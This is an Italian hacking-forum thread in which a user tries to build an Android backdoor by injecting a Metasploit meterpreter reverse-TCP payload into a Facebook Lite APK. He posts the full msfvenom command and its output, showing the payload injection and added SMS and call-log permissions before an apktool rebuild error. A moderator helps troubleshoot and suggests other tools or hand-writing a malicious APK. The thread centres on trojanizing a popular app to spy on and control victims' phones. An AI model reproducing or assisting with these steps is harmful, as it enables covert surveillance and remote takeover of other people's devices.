Domanda Malware Msfvenom: unable to rebuild apk with apktool

orlandoTv

Utente Iron
12 Ottobre 2021
18
6
6
13
Allora ragazzi ho questo problema stavo creando una backdoor apk per Android e ad un tratto mi dice Error: unable to rebuild apk with apktool

Ho apktool aggiornato all'ultima versione, digitato i comandi apt update e apt upgrade e apt-get install lib32z1 lib32ncurses5 lib32bz2-1.0 lib32stdc++6 poi ho fatto anche sudo apt-get install lib32stdc++6 lib32z1 lib32z1-dev , installato e rinstallato apktool, riavviato il PC, cambiato il file apk. Ma niente non funziona.
 

0xbro

Super Moderatore
24 Febbraio 2017
4,053
154
3,047
1,645
Allora ragazzi ho questo problema stavo creando una backdoor apk per Android e ad un tratto mi dice Error: unable to rebuild apk with apktool

Ho apktool aggiornato all'ultima versione, digitato i comandi apt update e apt upgrade e apt-get install lib32z1 lib32ncurses5 lib32bz2-1.0 lib32stdc++6 poi ho fatto anche sudo apt-get install lib32stdc++6 lib32z1 lib32z1-dev , installato e rinstallato apktool, riavviato il PC, cambiato il file apk. Ma niente non funziona.
Posta i comandi che hai usato per provare a creare la backdoor e anche il file APK che hai usato (magari mettilo sul drive e condividi il link al file). Potrebbe essere un problema di compatibilità, una versione buggata di apktool, SDK troppo moderne ecc. In genere l'embed di payload all'interno di un'APK non funziona più a causa del fatto che tutti i tool (sia metasploit che apk tool) sono rimasti abbastanza indietro col tempo dal punto di vista del mobile
 

orlandoTv

Utente Iron
12 Ottobre 2021
18
6
6
13
┌──(rootkali)-[~]
└─# msfvenom -x fblite.apk -p android/meterpreter/reverse_tcp LHOST=192.168.1.168 LPORT=4444 -o fbad.apk
Using APK template: fblite.apk
[-] No platform was selected, choosing Msf::Module::platform::Android from the payload
[-] No arch selected, selecting arch: dalvik from the payload
[*] Creating signing key and keystore..
[*] Decompiling original APK..
[*] Decompiling payload APK..
[*] Locating hook point..
[*] Adding payload as package com.facebook.lite.izdry
[*] Loading /tmp/d20211015-1234-6hvxg8/original/smali/com/facebook/lite/ClientApplicationSplittedShell.smali and injecting payload..
[*] Poisoning the manifest with meterpreter permissions..
[*] Adding <uses-permission android:name="android.permission.READ_CALL_LOG"/>
[*] Adding <uses-permission android:name="android.permission.READ_SMS"/>
[*] Adding <uses-permission android:name="android.permission.SEND_SMS"/>
[*] Adding <uses-permission android:name="android.permission.WRITE_SETTINGS"/>
[*] Adding <uses-permission android:name="android.permission.WRITE_CALL_LOG"/>
[*] Adding <uses-permission android:name="android.permission.SET_WALLPAPER"/>
[*] Adding <uses-permission android:name="android.permission.RECEIVE_SMS"/>
[*] Rebuilding apk with meterpreter injection as /tmp/d20211015-1234-6hvxg8/output.apk
[-] I: Using Apktool 2.5.0-dirty
I: Checking whether sources has changed...
I: Smaling smali folder into classes.dex...
I: Checking whether resources has changed...
I: Building resources...
W: aapt: brut.common.BrutException: brut.common.BrutException: Could not extract resource: /prebuilt/linux/aapt_64 (defaulting to $PATH binary)
W: /tmp/d20211015-1234-6hvxg8/original/res/values/ids.xml:265: error: Found tag id where item is expected
W:
W: /tmp/d20211015-1234-6hvxg8/original/res/values/raws.xml:3: error: Found tag raw where item is expected
W:
brut.androlib.AndrolibException: brut.common.BrutException: could not exec (exit code = 1): [aapt, p, --min-sdk-version, 15, --target-sdk-version, 30, --version-code, 324891641, --version-name, 273.0.0.12.48, --no-version-vectors, -F, /tmp/APKTOOL13198953055199350540.tmp, -0, resources.arsc, -0, assets/app_modules/contents/s_bloks_java.com.facebook.lite.mediastreaming.json, -0, assets/lib/libs.spk.xz, -0, png, -0, r/c.png, -0, ogg, -0, arsc, -I, /root/.local/share/apktool/framework/1.apk, -S, /tmp/d20211015-1234-6hvxg8/original/res, -M, /tmp/d20211015-1234-6hvxg8/original/AndroidManifest.xml]
Error: Unable to rebuild apk with apktool
Messaggio unito automaticamente:

link apk:
Vedi: https://drive.google.com/file/d/1PWZAGThu8EFEKlYKnTATdAwGB99lsjqg/view?usp=sharing
 

0xbro

Super Moderatore
24 Febbraio 2017
4,053
154
3,047
1,645
Ok ho fatto un paio di prove anche io usando anche altre APK di test ed effettivamente non funziona molto bene msfvenom in questo caso. Credo che il problema possa essere dovuto al fatto che le APK siano un minimo offuscate o abbiano SDK diverse da quelle che si aspetta msfvenom, e che quindi si "rompe". Ti consiglio di provare a cercare qualche altro tool o in alternativa provare a screivere un'APK malevola a mano, ma ti anticipo che non è una cosa tanto facile
 

orlandoTv

Utente Iron
12 Ottobre 2021
18
6
6
13
Della seria mai na gioia
Ok ho fatto un paio di prove anche io usando anche altre APK di test ed effettivamente non funziona molto bene msfvenom in questo caso. Credo che il problema possa essere dovuto al fatto che le APK siano un minimo offuscate o abbiano SDK diverse da quelle che si aspetta msfvenom, e che quindi si "rompe". Ti consiglio di provare a cercare qualche altro tool o in alternativa provare a screivere un'APK malevola a mano, ma ti anticipo che non è una cosa tanto facile
Della serie mai na gioia
 

0xbro

Super Moderatore
24 Febbraio 2017
4,053
154
3,047
1,645
Della seria mai na gioia

Della serie mai na gioia
Purtroppo (o perfortuna) le applicazioni Android sono troppo variegate e non mantengono sempre la stessa struttura. Esistono app native "vecchio stampo" (quelle inizialmente usate per i payload di msfvenom) che girano su un'architettura ormai vecchia, la Dalvik Virtual Machine, ormai rimpiazzata dall'Android Run Time. Ci sono poi le app scritte in Kotlin e quindi cross platform... insomma, un bel po' di differenze che rendono lavorare con le APK un vero casino.

Ti suggerisco di dare una lettura a questa guida introduttiva sul mondo android: